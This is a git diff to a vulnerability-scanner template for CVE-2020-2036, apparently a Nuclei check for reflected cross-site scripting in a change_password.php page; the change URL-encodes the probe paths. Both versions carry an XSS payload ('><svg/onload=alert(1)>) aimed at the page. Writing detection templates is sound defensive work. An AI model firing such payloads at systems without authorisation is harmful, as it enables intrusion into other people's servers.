diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
index 0749aebbe9..1bc96a8882 100644
--- a/cves/2020/CVE-2020-2036.yaml
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -9,8 +9,8 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/unauth/php/change_password.php/"><svg/onload=alert(1)>"
-      - "{{BaseURL}}/php/change_password.php/"><svg/onload=alert(1)>"
+      - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+      - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
     matchers-condition: and
     matchers:
       - type: status